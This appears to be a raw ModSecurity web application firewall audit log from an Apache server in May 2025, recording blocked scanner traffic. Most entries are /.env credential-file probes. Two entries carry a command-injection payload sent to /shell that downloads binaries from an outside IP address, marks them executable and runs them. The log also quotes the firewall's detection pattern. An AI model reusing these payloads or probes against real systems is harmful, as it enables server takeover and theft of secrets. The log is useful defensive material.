X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --f7c2a46b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f7c2a46b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746508792391863 890 (- - -) Stopwatch2: 1746508792391863 890; combined=332, p1=290, p2=0, p3=0, p4=0, p5=42, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f7c2a46b-Z-- --82fcac39-A-- [06/May/2025:12:19:52 +0700] aBmb-Efy6a2jfN9asT6j0wAAABM 103.236.140.4 54300 103.236.140.4 8181 --82fcac39-B-- GET /sendgrid/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 119.2.43.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 119.2.43.141 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --82fcac39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --82fcac39-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746508792435940 708 (- - -) Stopwatch2: 1746508792435940 708; combined=261, p1=229, p2=0, p3=0, p4=0, p5=32, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82fcac39-Z-- --067df944-A-- [06/May/2025:14:22:51 +0700] aBm4y_XApPfVm9Q69EhyvAAAAMI 103.236.140.4 49630 103.236.140.4 8181 --067df944-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept-Charset: utf-8 --067df944-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --067df944-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746516171606104 835 (- - -) Stopwatch2: 1746516171606104 835; combined=389, p1=346, p2=0, p3=0, p4=0, p5=43, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --067df944-Z-- --e5494605-A-- [06/May/2025:14:38:54 +0700] aBm8jkfy6a2jfN9asT7AxQAAABE 103.236.140.4 39072 103.236.140.4 8181 --e5494605-B-- GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+drea4+arm7;wget+http:/\/176.65.144.76/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\/176.65.144.76/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.218.84.39 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.218.84.39 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --e5494605-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5494605-E-- --e5494605-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:killall -9 arm7;killall -9 arm4;killall -9 arm;killall -9 /bin/sh;killall -9 /bin/sh;killall -9 /z/bin;killall -9 /bin/bash;cd /tmp;rm drea4 arm7;wget http:/\x5c\x5c/176.65.144.76/efefa7;chmod 777 efefa7;./efefa7 jaws;wget http:/\x5c\x5c/176.65.144.76/drea4;chmod 777 drea4;./drea4 jaws: killall -9 arm7 killall -9 arm4 killall -9 arm killall -9/bin/sh killall -9/bin/sh killall -9/z/bin killall -9/bin/bash cd/tmp rm drea4 arm7 wget http://176.65.144.76/efefa7 chmod..."] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746517134478953 2878 (- - -) Stopwatch2: 1746517134478953 2878; combined=904, p1=538, p2=322, p3=0, p4=0, p5=44, sr=103, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5494605-Z-- --9bc95a7e-A-- [06/May/2025:14:58:39 +0700] aBnBL_XApPfVm9Q69Eh6pQAAAMQ 103.236.140.4 48438 103.236.140.4 8181 --9bc95a7e-B-- GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+drea4+arm7;wget+http:/\/176.65.144.76/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\/176.65.144.76/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.218.84.39 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.218.84.39 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --9bc95a7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bc95a7e-E-- --9bc95a7e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:killall -9 arm7;killall -9 arm4;killall -9 arm;killall -9 /bin/sh;killall -9 /bin/sh;killall -9 /z/bin;killall -9 /bin/bash;cd /tmp;rm drea4 arm7;wget http:/\x5c\x5c/176.65.144.76/efefa7;chmod 777 efefa7;./efefa7 jaws;wget http:/\x5c\x5c/176.65.144.76/drea4;chmod 777 drea4;./drea4 jaws: killall -9 arm7 killall -9 arm4 killall -9 arm killall -9/bin/sh killall -9/bin/sh killall -9/z/bin killall -9/bin/bash cd/tmp rm drea4 arm7 wget http://176.65.144.76/efefa7 chmod..."] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746518319380910 2613 (- - -) Stopwatch2: 1746518319380910 2613; combined=915, p1=480, p2=387, p3=0, p4=0, p5=47, sr=79, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bc95a7e-Z-- --9d910c08-A-- [06/May/2025:15:18:18 +0700] aBnFykfy6a2jfN9asT7D8gAAABU 103.236.140.4 49750 103.236.140.4 8181 --9d910c08-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 196.251.67.143 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 196.251.67.143 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --9d910c08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d910c08-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746519498503436 1044 (- - -) Stopwatch2: 1746519498503436 1044; combined=421, p1=378, p2=0, p3=0, p4=0, p5=42, sr=132, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d910c08-Z-- --3002267e-A-- [06/May/2025:15:45:08 +0700] aBnMFDhugRYtrdwuyww64gAAAI4 103.236.140.4 49914 103.236.140.4 8181 --3002267e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.95 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.95 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --3002267e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3002267e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746521108210491 834 (- - -) Stopwatch2: 1746521108210491 834; combined=356, p1=309, p2=0, p3=0, p4=0, p5=47, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3002267e-Z-- --5700b47f-A-- [06/May/2025:15:45:10 +0700] aBnMFjhugRYtrdwuyww65wAAAJU 103.236.140.4 49924 103.236.140.4 8181 --5700b47f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.95 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.95 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --5700b47f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5700b47f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746521110951220 618 (- - -) Stopwatch2: 1746521110951220 618; combined=298, p1=272, p2=0, p3=0, p4=0, p5=26, sr=165, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5700b47f-Z-- --895d0702-A-- [06/May/2025:15:45:18 +0700] aBnMHkfy6a2jfN9asT7D_gAAAAo 103.236.140.4 49950 103.236.140.4 8181 --895d0702-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 164.92.244.132 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 164.92.244.132 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --895d0702-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --895d0702-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746521118694796 819 (- - -) Stopwatch2: 1746521118694796 819; combined=331, p1=297, p2=0, p3=0, p4=0, p5=34, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --895d0702-Z-- --f4375224-A-- [06/May/2025:16:12:31 +0700] aBnSfzhugRYtrdwuyww7EQAAAIk 103.236.140.4 50154 103.236.140.4 8181 --f4375224-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 124.158.12.5 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 124.158.12.5 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --f4375224-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4375224-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746522751448407 913 (- - -) Stopwatch2: 1746522751448407 913; combined=414, p1=357, p2=0, p3=0, p4=0, p5=57, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4375224-Z-- --209dac7a-A-- [06/May/2025:16:12:32 +0700] aBnSgDhugRYtrdwuyww7EwAAAJQ 103.236.140.4 50158 103.236.140.4 8181 --209dac7a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 124.158.12.5 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 124.158.12.5 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --209dac7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --209dac7a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746522752387293 689 (- - -) Stopwatch2: 1746522752387293 689; combined=257, p1=226, p2=0, p3=0, p4=0, p5=31, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --209dac7a-Z-- --74f1d92b-A-- [06/May/2025:16:50:12 +0700] aBnbVHQ-FFoo6luwbxLvQQAAAMM 103.236.140.4 50754 103.236.140.4 8181 --74f1d92b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.95 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.95 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --74f1d92b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --74f1d92b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746525012622731 1078 (- - -) Stopwatch2: 1746525012622731 1078; combined=395, p1=354, p2=0, p3=0, p4=0, p5=41, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74f1d92b-Z-- --c98c1f20-A-- [06/May/2025:16:50:15 +0700] aBnbV75Kt25brCRGiyhnSwAAABQ 103.236.140.4 50758 103.236.140.4 8181 --c98c1f20-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.95 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.95 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --c98c1f20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c98c1f20-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746525015019014 694 (- - -) Stopwatch2: 1746525015019014 694; combined=286, p1=253, p2=0, p3=0, p4=0, p5=33, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c98c1f20-Z-- --2a7d9f61-A-- [06/May/2025:16:51:00 +0700] aBnbhL5Kt25brCRGiyhnVAAAAAg 103.236.140.4 50782 103.236.140.4 8181 --2a7d9f61-B-- GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.156.130.43 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.156.130.43 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Accept: */* --2a7d9f61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a7d9f61-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746525060262797 2093 (- - -) Stopwatch2: 1746525060262797 2093; combined=989, p1=326, p2=629, p3=0, p4=0, p5=34, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a7d9f61-Z-- --c8a08064-A-- [06/May/2025:16:53:06 +0700] aBncAlodKr7jV1iEMs8S8AAAAJI 103.236.140.4 51706 103.236.140.4 8181 --c8a08064-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 164.90.208.56 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 164.90.208.56 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --c8a08064-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8a08064-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746525186377611 737 (- - -) Stopwatch2: 1746525186377611 737; combined=301, p1=266, p2=0, p3=0, p4=0, p5=35, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8a08064-Z-- --fb149e63-A-- [06/May/2025:17:35:49 +0700] aBnmBb5Kt25brCRGiyhpBAAAAAs 103.236.140.4 52262 103.236.140.4 8181 --fb149e63-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 139.59.136.184 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 139.59.136.184 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --fb149e63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb149e63-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746527749342779 917 (- - -) Stopwatch2: 1746527749342779 917; combined=403, p1=367, p2=0, p3=0, p4=0, p5=36, sr=144, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb149e63-Z-- --ec41c717-A-- [06/May/2025:17:51:39 +0700] aBnpu75Kt25brCRGiyhpHAAAAAU 103.236.140.4 52414 103.236.140.4 8181 --ec41c717-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A356 Safari/604.1 Accept-Charset: utf-8 --ec41c717-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec41c717-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746528699270925 838 (- - -) Stopwatch2: 1746528699270925 838; combined=345, p1=304, p2=0, p3=0, p4=0, p5=41, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec41c717-Z-- --cee61c32-A-- [06/May/2025:18:05:52 +0700] aBntEHQ-FFoo6luwbxLvjQAAAMg 103.236.140.4 52594 103.236.140.4 8181 --cee61c32-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 209.97.180.8 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 209.97.180.8 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --cee61c32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cee61c32-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746529552507076 880 (- - -) Stopwatch2: 1746529552507076 880; combined=380, p1=345, p2=0, p3=0, p4=0, p5=35, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cee61c32-Z-- --0840bf67-A-- [06/May/2025:18:26:35 +0700] aBnx61odKr7jV1iEMs8TaQAAAIg 103.236.140.4 52814 103.236.140.4 8181 --0840bf67-B-- GET 